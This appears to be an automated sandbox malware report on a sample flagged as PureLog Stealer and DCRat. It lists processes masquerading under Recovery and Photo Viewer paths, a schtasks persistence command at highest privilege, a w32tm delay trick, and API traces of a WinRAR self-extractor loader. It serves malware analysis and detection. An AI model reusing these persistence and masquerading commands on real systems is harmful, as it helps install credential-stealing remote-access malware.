Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\spoolsv.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "SurrogatesessionRuntimeBrokerDhcpS" /sc MINUTE /mo 14 /tr "'C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Recovery\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\spoolsv.exe
Imagebase:	0x2f0000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Imagebase:	0x3c0000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Imagebase:	0xc00000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2912163322.0000000003249000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2912163322.0000000003702000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.2912163322.0000000003562000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\n17UfJYjYj.bat"
Imagebase:	0x7ff6304e0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	16:18:19
Start date:	28/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6d0b70000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	16:18:20
Start date:	28/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff75bc80000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	16:18:22
Start date:	28/12/2024
Path:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Wow64 process (32bit):	false
Commandline:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Imagebase:	0x7f0000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	16:18:22
Start date:	28/12/2024
Path:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Wow64 process (32bit):	false
Commandline:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Imagebase:	0xda0000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	16:18:25
Start date:	28/12/2024
Path:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
Imagebase:	0x610000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:18:27
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Imagebase:	0xa40000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	16:18:36
Start date:	28/12/2024
Path:	C:\Recovery\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\spoolsv.exe"
Imagebase:	0x480000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	16:18:45
Start date:	28/12/2024
Path:	C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe
Wow64 process (32bit):	false
Commandline:	"C:\webFontsession\SurrogatesessionRuntimeBrokerDhcp.exe"
Imagebase:	0xc40000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	16:18:53
Start date:	28/12/2024
Path:	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\windows photo viewer\wDyQbcxdSUUjszASb.exe"
Imagebase:	0x280000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	16:19:02
Start date:	28/12/2024
Path:	C:\Recovery\spoolsv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\spoolsv.exe"
Imagebase:	0xb00000
File size:	1'922'560 bytes
MD5 hash:	73E7655A3D54309A3CCFB3B9CA197652
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1506
Total number of Limit Nodes:	27

Executed Functions

Function 00ACDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AC0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00AC087C
Part of subcall function 00AC0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00AC088E
Part of subcall function 00AC0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00AC08BF

Part of subcall function 00ACA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00ACA655

Part of subcall function 00ACAC16: OleInitialize.OLE32(00000000), ref: 00ACAC2F
Part of subcall function 00ACAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00ACAC66
Part of subcall function 00ACAC16: SHGetMalloc.SHELL32(00AF8438), ref: 00ACAC70

GetCommandLineW.KERNEL32 ref: 00ACDF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00ACDF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00ACDF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00ACDFCE

Part of subcall function 00ACDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00ACDBF4
Part of subcall function 00ACDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00ACDC30

CloseHandle.KERNEL32(00000000), ref: 00ACDFD7
GetModuleFileNameW.KERNEL32(00000000,00B0EC90,00000800), ref: 00ACDFF2
SetEnvironmentVariableW.KERNEL32(sfxname,00B0EC90), ref: 00ACDFFE
GetLocalTime.KERNEL32(?), ref: 00ACE009
_swprintf.LIBCMT ref: 00ACE048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00ACE05A
GetModuleHandleW.KERNEL32(00000000), ref: 00ACE061
LoadIconW.USER32(00000000,00000064), ref: 00ACE078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00ACE0C9
Sleep.KERNEL32(?), ref: 00ACE0F7
DeleteObject.GDI32 ref: 00ACE130
DeleteObject.GDI32(?), ref: 00ACE140
CloseHandle.KERNEL32 ref: 00ACE183

Strings

winrarsfxmappingfile.tmp, xrefs: 00ACDF77
C:\Users\user\Desktop, xrefs: 00ACDF33
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00ACE039
sfxname, xrefs: 00ACDFF9
sfxstime, xrefs: 00ACE055
STARTDLG, xrefs: 00ACE0BE

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-3743209390
Opcode ID: 20012adbcbfe60fda26c1465fa17632a03d7063c78ed4ce35938512fdf7227c8
Instruction ID: 17984104fed77ed765e11c432f904cfd6f0a602915b51a0cf149c168d20239ce
Opcode Fuzzy Hash: 20012adbcbfe60fda26c1465fa17632a03d7063c78ed4ce35938512fdf7227c8
Instruction Fuzzy Hash: BC611071A04285AFD720EBF5AD8AF7B7BECEB18704F05042DF905972A1EE789904C761

Function 00ACA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00ACB73D,00000066), ref: 00ACA6D5
SizeofResource.KERNEL32(00000000,?,?,?,00ACB73D,00000066), ref: 00ACA6EC
LoadResource.KERNEL32(00000000,?,?,?,00ACB73D,00000066), ref: 00ACA703
LockResource.KERNEL32(00000000,?,?,?,00ACB73D,00000066), ref: 00ACA712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00ACB73D,00000066), ref: 00ACA72D
GlobalLock.KERNEL32(00000000), ref: 00ACA73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00ACA762
GlobalUnlock.KERNEL32(00000000), ref: 00ACA7C6

Part of subcall function 00ACA626: GdipAlloc.GDIPLUS(00000010), ref: 00ACA62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00ACA7A7
GlobalFree.KERNEL32(00000000), ref: 00ACA7CD

Strings

PNG, xrefs: 00ACA6C6

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: f0e79d6fdaf96e6a2e7253a748564069a47faa87cdcf1b30b0d19a68ff88db44
Instruction ID: 6a78ea736d086d0039166517b6b8605d81b0b0381fb9322bd8824830667f6f41
Opcode Fuzzy Hash: f0e79d6fdaf96e6a2e7253a748564069a47faa87cdcf1b30b0d19a68ff88db44
Instruction Fuzzy Hash: 37318E76600346ABDB109FA1EC88E3B7AA8FB94754B01461DF805C7620EB31D8419BA1

Function 00ABA69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA6C4

Part of subcall function 00ABBB03: _wcslen.LIBCMT ref: 00ABBB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA728
GetLastError.KERNEL32(?,?,?,?,00ABA592,000000FF,?,?), ref: 00ABA734

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: cc651eca3d7714e0026c23945fc17a75a3c27a54135ac46b78f632ff10e8ddd0
Instruction ID: b56d68bd8a897aebb7d1d7374bdc1e5a7f890e2846a5823ba5b3ae5b53b7c0ac
Opcode Fuzzy Hash: cc651eca3d7714e0026c23945fc17a75a3c27a54135ac46b78f632ff10e8ddd0
Instruction Fuzzy Hash: 27418E72900159ABCB25DF64CC88AEAB7BCFB48350F1045AAE55EE3201DB346E90DF90

Function 00AD7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00AD7DC4,00000000,00AEC300,0000000C,00AD7F1B,00000000,00000002,00000000), ref: 00AD7E0F
TerminateProcess.KERNEL32(00000000,?,00AD7DC4,00000000,00AEC300,0000000C,00AD7F1B,00000000,00000002,00000000), ref: 00AD7E16
ExitProcess.KERNEL32 ref: 00AD7E28

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 66fdaa64fdd9ea944e5cf9119d9e7b8046a1cfa29378b70018927b3cac84b21a
Instruction ID: 8ba95511dd44811e70e460659960693f32c6da627cc94aedd7236a0f688fc2b7
Opcode Fuzzy Hash: 66fdaa64fdd9ea944e5cf9119d9e7b8046a1cfa29378b70018927b3cac84b21a
Instruction Fuzzy Hash: 2FE0B632004188EBCF15AFA4DE4DA5E7F6AEF50341B004456F81A8B232DF3ADE52DB90

Function 00AB848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00AB8493

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 5c9230060c6c6fee37f5b46e50a404678048809fa6b15bce6949d40de7988692
Instruction ID: 1db6f2137c2418792b557dea5836e776592d31c9bb5af194d860888b5bfb741d
Opcode Fuzzy Hash: 5c9230060c6c6fee37f5b46e50a404678048809fa6b15bce6949d40de7988692
Instruction Fuzzy Hash: 1E82EB71904145AEDF25DF78C895BFABBBDBF05300F0841BAE9499B143DB395A84CB60

Function 00ACB7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00ACB7E5

Part of subcall function 00AB1316: GetDlgItem.USER32(00000000,00003021), ref: 00AB135A
Part of subcall function 00AB1316: SetWindowTextW.USER32(00000000,00AE35F4), ref: 00AB1370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00ACB8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ACB8EF
IsDialogMessageW.USER32(?,?), ref: 00ACB902
TranslateMessage.USER32(?), ref: 00ACB910
DispatchMessageW.USER32(?), ref: 00ACB91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00ACB93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00ACB960
GetDlgItem.USER32(?,00000068), ref: 00ACB983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00ACB99E
SendMessageW.USER32(00000000,000000C2,00000000,00AE35F4), ref: 00ACB9B1

Part of subcall function 00ACD453: _wcslen.LIBCMT ref: 00ACD47D

SetFocus.USER32(00000000), ref: 00ACB9B8
_swprintf.LIBCMT ref: 00ACBA24

Part of subcall function 00AB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00AB40A5

Part of subcall function 00ACD4D4: GetDlgItem.USER32(00000068,00B0FCB8), ref: 00ACD4E8
Part of subcall function 00ACD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00ACAF07,00000001,?,?,00ACB7B9,00AE506C,00B0FCB8,00B0FCB8,00001000,00000000,00000000), ref: 00ACD510
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00ACD51B
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00AE35F4), ref: 00ACD529
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00ACD53F
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00ACD559
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00ACD59D
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00ACD5AB
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00ACD5BA
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00ACD5E1
Part of subcall function 00ACD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00AE43F4), ref: 00ACD5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00ACBA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00ACBA90
GetTickCount.KERNEL32 ref: 00ACBAAE
_swprintf.LIBCMT ref: 00ACBAC2
GetLastError.KERNEL32(?,00000011), ref: 00ACBAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00ACBB43
_swprintf.LIBCMT ref: 00ACBB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00ACBBD0
GetCommandLineW.KERNEL32 ref: 00ACBBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00ACBC47
ShellExecuteExW.SHELL32(0000003C), ref: 00ACBC6F
Sleep.KERNEL32(00000064), ref: 00ACBCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00ACBCE2
CloseHandle.KERNEL32(00000000), ref: 00ACBCEB
_swprintf.LIBCMT ref: 00ACBD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00ACBD7D
SetDlgItemTextW.USER32(?,00000065,00AE35F4), ref: 00ACBD94
GetDlgItem.USER32(?,00000065), ref: 00ACBD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 00ACBDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00ACBDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00ACBE68
_wcslen.LIBCMT ref: 00ACBEBE
_swprintf.LIBCMT ref: 00ACBEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 00ACBF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00ACBF4C
GetDlgItem.USER32(?,00000068), ref: 00ACBF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00ACBF6B
GetDlgItem.USER32(?,00000066), ref: 00ACBF85
SetWindowTextW.USER32(00000000,00AFA472), ref: 00ACBFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00ACC007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00ACC01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00ACC0BD
EnableWindow.USER32(00000000,00000000), ref: 00ACC197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00ACC1D9

Part of subcall function 00ACC73F: __EH_prolog.LIBCMT ref: 00ACC744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00ACC1FD

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00ACBB6B
<, xrefs: 00ACBB84
winrarsfxmappingfile.tmp, xrefs: 00ACBBA6
C:\Users\user\Desktop, xrefs: 00ACBBC9
"%s"%s, xrefs: 00ACBD0D
%s, xrefs: 00ACBED8
LICENSEDLG, xrefs: 00ACC0B2
@, xrefs: 00ACBB91
STARTDLG, xrefs: 00ACB801
__tmp_rar_sfx_access_check_%u, xrefs: 00ACBAB5

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 3445078344-2238251102
Opcode ID: 98005513e66d780b34a2be6fb9f2da9bdfabc269cd866b2f0850eda2d4ab5a62
Instruction ID: 8c9ec78d6028f1c6c6f187c08350897cae8e3e5db497af048e5df79db4dc0b36
Opcode Fuzzy Hash: 98005513e66d780b34a2be6fb9f2da9bdfabc269cd866b2f0850eda2d4ab5a62
Instruction Fuzzy Hash: 4C42F171944248BAEB21EBB09D4AFFE7BACAB11B00F054158F644A70D2DF795A45CB22

Function 00AC0863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00AC087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00AC088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00AC08BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00AC0B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AC0B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AC0B93
ReadFile.KERNEL32(00000000,?,00007FFE,00AE3C7C,00000000), ref: 00AC0BB1
CloseHandle.KERNEL32(00000000), ref: 00AC0C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00AC0C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00AE3C7C,?,00000000,?,00000800), ref: 00AC0C72
GetFileAttributesW.KERNELBASE(?,?,00AE3C7C,00000800,?,00000000,?,00000800), ref: 00AC0C9C
GetFileAttributesW.KERNEL32(?,?,00AE3D44,00000800), ref: 00AC0CD8

Part of subcall function 00AC081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00AC0836
